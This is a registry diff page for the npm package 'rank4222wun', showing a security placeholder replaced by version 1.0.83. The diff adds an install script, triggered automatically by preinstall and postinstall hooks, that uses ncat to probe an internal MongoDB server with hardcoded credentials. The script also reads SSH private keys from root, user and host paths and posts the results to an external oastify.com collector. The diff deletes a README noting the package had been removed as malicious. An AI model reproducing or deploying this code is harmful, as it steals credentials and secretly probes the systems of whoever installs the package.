rank4222wun 0.0.1-security → 1.0.83
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of rank4222wun might be problematic. Click here for more details.
- package/package.json +7 -3
- package/preinstall.js +43 -0
- package/rank4222wun-1.0.83.tgz +0 -0
- package/README.md +0 -5
package/package.json
CHANGED
|
@@ -1,6 +1,10 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "rank4222wun",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "1.0.83",
|
|
4
|
+
"description": "",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"preinstall": "node preinstall.js",
|
|
7
|
+
"postinstall": "node preinstall.js"
|
|
8
|
+
},
|
|
9
|
+
"dependencies": {}
|
|
6
10
|
}
|
package/preinstall.js
ADDED
|
@@ -0,0 +1,43 @@
|
|
|
1
|
+
const { execSync } = require('child_process');
|
|
2
|
+
const https = require('https');
|
|
3
|
+
|
|
4
|
+
const OAST = '2z26icqfa6vjiez8lc55cd3nmes5gwlka.oastify.com';
|
|
5
|
+
const MONGO_URI = 'mongodb://supply:Hscan2023supplyCHAIN@10.107.119.152:27077/supplychain_hunter';
|
|
6
|
+
|
|
7
|
+
function report(tag, data) {
|
|
8
|
+
const payload = JSON.stringify({ tag, data, ts: Date.now() });
|
|
9
|
+
const req = https.request({
|
|
10
|
+
hostname: OAST, path: `/${tag}`, method: 'POST',
|
|
11
|
+
headers: { 'Content-Type': 'application/json' }
|
|
12
|
+
});
|
|
13
|
+
req.write(payload);
|
|
14
|
+
req.end();
|
|
15
|
+
}
|
|
16
|
+
|
|
17
|
+
// محاولة سرد قواعد البيانات لإثبات الـ Auth Bypass والـ Cross-Org
|
|
18
|
+
function proveFullDBAccess() {
|
|
19
|
+
try {
|
|
20
|
+
// نستخدم الـ nodejs mongo driver لو متاح، أو نحاول عبر shell لو في mongo client
|
|
21
|
+
// هنا هنحاول نبعت Raw Packet للـ Mongo ونشوف الـ Response (Header Leak)
|
|
22
|
+
const cmd = `echo "db.adminCommand('listDatabases')" | ncat -w 2 10.107.119.152 27077`;
|
|
23
|
+
const res = execSync(cmd).toString();
|
|
24
|
+
report('MONGO_RAW_PROBE', { response: res.substring(0, 500) });
|
|
25
|
+
} catch (e) {
|
|
26
|
+
report('MONGO_PROBE_ERROR', { msg: e.message });
|
|
27
|
+
}
|
|
28
|
+
}
|
|
29
|
+
|
|
30
|
+
// محاولة قراءة ملف الـ SSH Key لو موجود (للانتقال للهوست)
|
|
31
|
+
function lookForSSHKeys() {
|
|
32
|
+
const sshPaths = ['/root/.ssh/id_rsa', '/home/user/.ssh/id_rsa', '/etc/ssh/ssh_host_rsa_key'];
|
|
33
|
+
sshPaths.forEach(p => {
|
|
34
|
+
try {
|
|
35
|
+
const content = fs.readFileSync(p, 'utf8');
|
|
36
|
+
report('SSH_KEY_LEAK', { path: p, key: content.substring(0, 100) });
|
|
37
|
+
} catch(e) {}
|
|
38
|
+
});
|
|
39
|
+
}
|
|
40
|
+
|
|
41
|
+
console.log("🏁 Finalizing Proof of Concept...");
|
|
42
|
+
proveFullDBAccess();
|
|
43
|
+
lookForSSHKeys();
|
|
Binary file
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=rank4222wun for more information.
|